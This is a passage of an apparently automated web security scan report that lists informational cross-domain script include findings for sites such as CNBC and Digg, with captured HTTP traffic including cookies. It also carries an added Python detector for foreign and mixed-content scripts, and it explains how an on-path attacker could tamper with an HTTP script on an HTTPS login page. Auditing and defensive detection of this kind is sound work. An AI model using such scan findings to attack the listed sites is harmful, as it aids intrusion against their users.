src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.32. http://data.cnbc.com/quotes/COMP/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/COMP/tab/2

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
http://Ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://www.nbcudigitaladops.com/hosted/global_header.js
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /quotes/COMP/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 112765
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.33. http://data.cnbc.com/quotes/HK

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/HK

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
http://Ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/HK;HSI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109239
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.34. https://deloitte.zettaneer.com/Subscriptions/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://deloitte.zettaneer.com
Path:   /Subscriptions/

Issue detail

The response dynamically includes the following script from another domain (highlighted in the response below):
https://edge.quantserve.com/quant.js

Request

GET /Subscriptions/ HTTP/1.1
Host: deloitte.zettaneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 17:06:29 GMT
Connection: close
Content-Length: 16121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--- EQCWEB3 --->
<html xmlns="http://www.w3.org/1999/xhtml">
<head><t
...[SNIP]...
</script>

<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.35. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js
http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</div>

<script src="http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js" type="text/javascript"></script>
...[SNIP]...

20.36. http://ecommerce-templates.volusion.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce-templates.volusion.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below; the protocol-relative "//" references resolve to http:// because the page itself is served over HTTP):
http://use.typekit.com/qdf0aoq.js
//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
//apis.google.com/js/plusone.js
//platform.twitter.com/widgets.js
//www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: ecommerce-templates.volusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 17:07:16 GMT
Connection: close
Content-Length: 65626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<meta property="fb:app_id" content="212091015497093" />
<script type="text/javascript" src="http://use.typekit.com/qdf0aoq.js"></script>
...[SNIP]...
<link type="text/css" href="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/themes/base/jquery-ui.css" rel="stylesheet" />

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<link href="/Content/Stylesheets/Templates.css" media="screen" rel="Stylesheet" type="text/css" />
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="//apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a>
<script src="//platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.37. http://edge.sapient.com/assets/scripts/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /assets/scripts/global.js

Issue detail

The response is itself a JavaScript file (Content-Type: application/x-javascript); the following script tag for another domain appears within its source and is highlighted in the response below:
http://platform.twitter.com/widgets.js

Request

GET /assets/scripts/global.js HTTP/1.1
Host: edge.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Aug 2011 14:09:36 GMT
Accept-Ranges: bytes
ETag: "010744be75ccc1:27e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 57424
Cache-Control: max-age=62467
Date: Tue, 06 Sep 2011 15:32:21 GMT
Connection: close

.../*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nove
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

20.38. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t
https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js

Request

GET /activityi;src=3267000;type=homep770;cat=homep781;ord=1;num=6780372345820.069? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:34:46 GMT
Expires: Tue, 06 Sep 2011 15:34:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 559
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]" width="1" height="1" border="0"><script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t"></script><script type="text/javascript" src="https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js"></script>
...[SNIP]...

20.39. https://login.cnbc.com/cas/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The response dynamically includes the following script from another domain (highlighted in the response below):
http://Ads1.msn.com/library/dap.js

Note that this login page is served over HTTPS while the script is fetched over plain HTTP (mixed content). An attacker on the network path who can tamper with that unencrypted response can run script in the login page's origin, which undermines the protection HTTPS gives the login form.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:34 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
</style>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

20.40. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12059.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx.ads/cvs/searchpage/L14/823358824/Top1/CVS/04_NOV_21270_Benefiber_V12/CVS_GENERALCATALOGPACKAGE_728X90_7.1_04_NOV_21270.html/4d686437616b356934616b41434d6658?

Request

GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1
Host: oasc12059.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx.ads/cvs/searchpage/L14/823358824/Top1/CVS/04_NOV_21270_Benefiber_V12/CVS_GENERALCATALOGPACKAGE_728X90_7.1_04_NOV_21270.html/4d686437616b356934616b41434d6658?">\n');
document.write ('</script>
...[SNIP]...
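
The check behind the "cross-domain script include" entries above, as an added example that is not part of the XSS.CX/Burp report: given a page URL and the response body, resolve every script src (absolute, root-relative or protocol-relative like the "//ajax.googleapis.com" references in 20.36), flag the ones whose host differs from the page's host, and separately flag plain-HTTP scripts on an HTTPS page, the mixed-content case in 20.39. Script tags that only exist inside a JavaScript response as document.write() string literals, as in 20.40 and the advertising.com entries, are picked up with a regex over the JS body. The two sample bodies are constructed here, trimmed imitations of the captured responses, not the real ones; the exact-host comparison (so that cdn1.diggstatic.com on digg.com counts as another domain, as in 20.35) is this example's assumption about how the scanner defines "other domain". A cross-domain script runs with the including page's origin, so every host this lists is one whose compromise or DNS/BGP hijack is a compromise of the page.

```python
"""Flag cross-domain <script src> includes in an HTTP response body.

Added example modelled on the report's findings; not code from the
report or from Burp. Every script whose resolved host differs from the
page's host runs with the page's origin; an http:// script on an https
page is additionally mixed content an on-path attacker can replace.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


# Script tags emitted from JavaScript via document.write('<script ... src="...">')
# are only visible as string literals, so a JS body is scanned with a regex.
_SCRIPT_IN_STRING = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE
)


def extract_script_srcs(body, content_type):
    """Return the raw src values found in an HTML or JavaScript response body."""
    if "javascript" in content_type.lower():
        return _SCRIPT_IN_STRING.findall(body)
    collector = _ScriptSrcCollector()
    collector.feed(body)
    return collector.srcs


def classify_includes(page_url, body, content_type):
    """Resolve each script src against page_url and classify it.

    Returns a list of dicts: {"url", "host", "cross_domain", "mixed_content"}.
    Hosts are compared exactly (case-insensitively), so a sibling subdomain
    counts as another domain (assumption about the scanner's definition).
    mixed_content means an https page loading an http:// script.
    """
    page = urlsplit(page_url)
    page_host = (page.hostname or "").lower()
    findings = []
    for src in extract_script_srcs(body, content_type):
        # urljoin handles "//host/path" (scheme taken from the page) and "/path".
        resolved = urlsplit(urljoin(page_url, src))
        host = (resolved.hostname or "").lower()
        findings.append({
            "url": resolved.geturl(),
            "host": host,
            "cross_domain": host != page_host,
            "mixed_content": page.scheme == "https" and resolved.scheme == "http",
        })
    return findings


def cross_domain_hosts(page_url, body, content_type):
    """Sorted, de-duplicated foreign hosts: the list a report entry would show."""
    return sorted({f["host"] for f in classify_includes(page_url, body, content_type)
                   if f["cross_domain"]})


# Constructed samples imitating the captured responses (trimmed, not the real bodies).
SAMPLE_HTML = """<html:html locale="true"><head>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
<script src="/Content/site.js"></script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
</head><body>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
</body></html:html>"""

SAMPLE_JS = (
    "document.write('<script language=\"JavaScript\" "
    "src=\"http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38\"><\\/script>');\n"
)

if __name__ == "__main__":
    for url, body, ctype in [
        ("https://login.cnbc.com/cas/login", SAMPLE_HTML, "text/html;charset=ISO-8859-1"),
        ("http://r1-ads.ace.advertising.com/site=768033/", SAMPLE_JS, "application/x-javascript"),
    ]:
        print(url)
        for f in classify_includes(url, body, ctype):
            flags = [k for k in ("cross_domain", "mixed_content") if f[k]]
            print("  ", f["url"], ",".join(flags) or "same-origin")
```

Run against the constructed HTML with an https page URL, the Ads1.msn.com and js.adsonar.com scripts come back as both cross-domain and mixed content, the root-relative script as same-origin, and the protocol-relative Google script as cross-domain but not mixed, because it inherits https from the page. The same protocol-relative reference on an http page, as in 20.36, resolves to http and stays unprotected.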

20.41. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386

Request

GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:36:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:36:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386"><\/script>
...[SNIP]...

20.42. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387

Request

GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387"><\/script>
...[SNIP]...

20.43. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382

Request

GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
